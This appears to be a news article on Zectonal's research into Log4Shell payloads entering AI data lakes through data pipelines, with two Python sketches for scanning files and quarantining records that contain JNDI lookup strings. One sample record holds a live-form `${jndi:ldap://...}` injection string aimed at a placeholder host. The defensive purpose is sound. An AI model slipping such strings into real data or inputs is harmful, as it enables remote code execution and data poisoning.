Enterprise data lakes are filling up as organizations increasingly embrace artificial intelligence (AI) and machine learning, but these repositories are vulnerable to exploitation via the Java Log4Shell vulnerability, researchers have found.
Generally, organizations are focused on ingesting as many data points as they can for training an AI or algorithm, with an eye toward privacy, but all too often they’re skipping over hardening the security of the data lakes themselves.
According to research from Zectonal, the Log4Shell bug can be triggered once a malicious payload is ingested into a target data lake or data repository via a data pipeline, bypassing conventional safeguards such as application firewalls and traditional scanning devices.
As with the original attacks targeting the ubiquitous Java Log4j library, exploitation requires only a single string of text. An attacker could simply embed the string within a malicious big-data file payload to open up a shell inside the data lake, and from there can initiate a data-poisoning attack, researchers say. And, since the big-data file carrying the poison payload is often encrypted or compressed, the difficulty of detection is much greater.
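To make the detection problem concrete, the following is a minimal sketch of a pre-ingestion check, not a method described in the Zectonal report. It assumes the payload carries the classic, unobfuscated `${jndi:` lookup prefix associated with Log4Shell and that the file is either plain bytes or gzip-compressed. The function name `contains_jndi_lookup` is hypothetical. Encrypted files and obfuscated variants of the string would pass through this check unnoticed, which illustrates why detection is hard.

```python
import gzip
import re
import zlib

# Assumption: only the classic, unobfuscated lookup prefix is matched.
JNDI_PATTERN = re.compile(rb"\$\{jndi:", re.IGNORECASE)

# Every gzip stream starts with these two magic bytes.
GZIP_MAGIC = b"\x1f\x8b"


def contains_jndi_lookup(payload: bytes) -> bool:
    """Return True if the payload contains a JNDI lookup string.

    Gzip-compressed payloads are decompressed first, because the
    string is not visible in the compressed bytes.
    """
    if payload.startswith(GZIP_MAGIC):
        try:
            payload = gzip.decompress(payload)
        except (OSError, EOFError, zlib.error):
            # Not a valid gzip stream after all; scan the raw bytes.
            pass
    return JNDI_PATTERN.search(payload) is not None
```

A pipeline could call such a check on each incoming file before it is written to the data lake and quarantine anything that matches. A real deployment would also need to handle the other compression schemes and big-data file formats the pipeline accepts.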
“The simplicity of the Log4jShell exploit is what makes it so nefarious,” says David Hirko, founder at Zectonal. “This particular attack vector is difficult to monitor and identify as a threat due to the fact that it blends in with normal operations of data pipelines, big-data distributed systems, and machine-learning training algorithms.”
Leveraging RCE Exploits to Access Data Lakes
One of the ways to accomplish this attack is by targeting vulnerable versions of a no-code, open source extract-transform-load (ETL) software application, one of the most popular tools for populating data lakes. An attacker could access the ETL service running in a private subnet from the public Internet via a known remote code execution (RCE) exploit, researchers explain in the report.
The Zectonal team put together a working proof-of-concept (PoC) exploit that used this vector, successfully gaining remote access to subnet IP addresses that were part of a virtual private cloud hosted by a public cloud provider.
While the ETL software’s maintainers patched the RCE issue last year, the components have been downloaded millions of times, and it appears that security teams have lagged in applying the fix. The Zectonal team was successful in “triggering an RCE exploit for multiple unpatched releases of the ETL software that spanned a two-year period,” according to the report, shared with Dark Reading prior to publication.
“This attack vector isn’t as simple as just kind of sending a text string to a Web server,” Hirko says, noting the need to penetrate the data supply chain. “An attacker needs to compromise a file somewhere upstream and then have it be flowed into the target data lake. Say you were considering weather data — you might be able to manipulate a file from a weather sensor so that it contained this particular string.”
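As an illustration of the weather-sensor scenario Hirko describes, the sketch below checks individual records rather than whole files. It assumes the upstream feed arrives as JSON Lines (one JSON object per line), which the report does not specify, and it flags any string value containing `${`, the opening of Log4j lookup syntax. The field names and the helpers `find_suspicious_fields` and `partition_records` are hypothetical. Flagging every `${` is deliberately broad and may produce false positives on legitimate data.

```python
import json

# Assumption: any "${" in a string value is treated as suspicious,
# since it opens Log4j lookup syntax (including nested variants).
SUSPICIOUS_TOKEN = "${"


def find_suspicious_fields(value, path=""):
    """Yield the paths of string values that contain lookup-style syntax."""
    if isinstance(value, dict):
        for key, item in value.items():
            child = f"{path}.{key}" if path else str(key)
            yield from find_suspicious_fields(item, child)
    elif isinstance(value, list):
        for index, item in enumerate(value):
            yield from find_suspicious_fields(item, f"{path}[{index}]")
    elif isinstance(value, str) and SUSPICIOUS_TOKEN in value:
        yield path


def partition_records(lines):
    """Split JSON Lines input into clean and quarantined records."""
    clean, quarantined = [], []
    for line in lines:
        record = json.loads(line)
        if any(find_suspicious_fields(record)):
            quarantined.append(record)
        else:
            clean.append(record)
    return clean, quarantined


if __name__ == "__main__":
    feed = [
        '{"station": "KSEA", "temp_c": 21.5}',
        '{"station": "KSEA", "meta": {"note": "${jndi:ldap://example.invalid/a}"}}',
    ]
    clean, quarantined = partition_records(feed)
    print(len(clean), "clean;", len(quarantined), "quarantined")
```

This sketch inspects values only, not dictionary keys, and it does nothing about records that are well-formed but factually wrong, which is the data-poisoning half of the problem.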
Patches are available for this particular vulnerability, but there are likely many other avenues to achieving this kind of Log4Shell attack.
“There are probably many, many previously unknown or undisclosed vulnerabilities that allow the same thing,” Hirko says. “This is one of the first data poisoning-specific attack vectors that we’ve seen, but we believe that data poisoning as a subset of AI poisoning is going to be one of the new attack vectors of the future.”
So far, Zectonal hasn’t seen such attacks in the wild, but researchers hope the threat is on security teams’ radar screens. Such attacks may be rare, but they can have outsized consequences. For instance, consider the case of autonomous vehicles, which rely on AI and sensors to navigate city streets.
“Automakers are training their AI to look at stoplights, to know when to stop, slow down, or go in the classic red, yellow, green format,” Hirko explains. “If you were to start poisoning your data lake that was training your AI, it’s possible to manipulate the AI software to behave in unforeseen ways. Perhaps your car unintentionally gets trained to go when the traffic light turns red and stop when it turns green. So, that’s the type of attack vector that we suspect we’ll be seeing in the future.”
Security Protections Lag
The risks are gaining a higher profile among practitioners, many of whom understand the danger but are at a loss for how to tackle it, Hirko tells Dark Reading. Among the challenges is the fact that approaching the problem requires a new way of implementing security, as well as new tools.
“We were able to send the poisoned payload through a pretty common data pipeline,” Hirko says. “Traditionally, these kinds of files and data pipelines don’t come through your standard front-door set of firewalls. How data comes into the enterprise, how data comes into the data lake, hasn’t really been part of the classic security posture of defense in depth or zero trust. If you’re using any of the major cloud providers, data that comes in from an object storage bucket won’t necessarily come through that firewall.”
He adds that the file formats that these types of attacks can be bundled into are relatively new and somewhat obscure — and because they’re specific to the big data and AI world, they’re not as easy to scan with typical security tools, which are made to scan documents or spreadsheets.
For their part, security vendors need to develop different types of products that provide that additional visibility, he notes.
“Companies are looking at the quality of the data, components, individual data points — and it just makes sense to look at the security vulnerability of that data as well,” Hirko says. “We suspect that data observability will be built into quality assurance as well as data security. This is an emerging kind of data and AI security domain.”